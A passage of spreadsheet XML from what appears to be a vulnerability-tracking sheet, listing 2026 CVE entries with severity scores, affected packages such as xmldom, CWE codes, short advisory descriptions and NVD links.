          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M460" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M461" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-400</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M462" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M463" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M464" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M465" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M466" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M467" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M468" s="5" t="inlineStr">
        <is>
          <t>0.8.15</t>
        </is>
      </c>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84190</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions before 26.5.0 contain a remote code execution vulnerability in the AboutController where the snmpget configuration parameter is passed to shell_exec() without proper validation. An authenticated administrator can modify the snmpget configuration to point to a malicious executable file and trigger code execution by accessing the /about endpoint.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84190</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84202</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>ModelScope uses PyYAML's unsafe yaml.Loader to parse model configuration files, allowing arbitrary code execution through Python object construction tags. Attackers can craft malicious model repositories with poisoned configuration files that execute code when loaded by users.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84202</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84208</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>AVideo through version 29.0 contains an unauthenticated SQL injection vulnerability in the User_Location plugin's regions.json.php and cities.json.php endpoints. The country and region GET parameters are passed directly into SQL queries without escaping or prepared statement binding, allowing unauthenticated attackers to execute UNION-based SQL injection to read arbitrary database contents including password hashes and sensitive data.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84208</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84476</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate trusted proxies before accepting X-Real-IP and X-Forwarded-For headers, allowing attackers to spoof the client address used by enforceRateLimit(). Attackers can rotate the header value per request to bypass login rate limiting and perform unlimited credential guessing attacks.</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84476</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84482</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit 9c39d8c8 contains a cross-site request forgery vulnerability in the get_domain() and isSameDomain() functions that fail to properly validate referer origins. Attackers can forge requests from sibling subdomains or unparseable long-gTLD origins to perform administrative ObjectYPT writes including live server configuration changes.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84482</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85147</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain a specific password from the source code, which can be used to retrieve the AES encryption key used for communication.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85147</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85169</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain an expression sandbox escape in the $fromAI handler. $fromAI resolved a caller-supplied placeholder name without requiring it to be an own property and admitted reserved keys; against a primitive input value it returned a live host-prototype reference. An attacker with workflow-build privilege can walk the prototype chain to the Function constructor and compile/execute arbitrary code in the main n8n process, leading to remote code execution.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85169</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85174</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 logs API tokens from query parameters in plaintext to an accessible log file when full-text search requests exceed timing thresholds. Authenticated attackers can read the log file via the getFile endpoint to recover admin API tokens and gain permanent administrative access.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85174</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85429</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R477" s="5" t="inlineStr">
        <is>
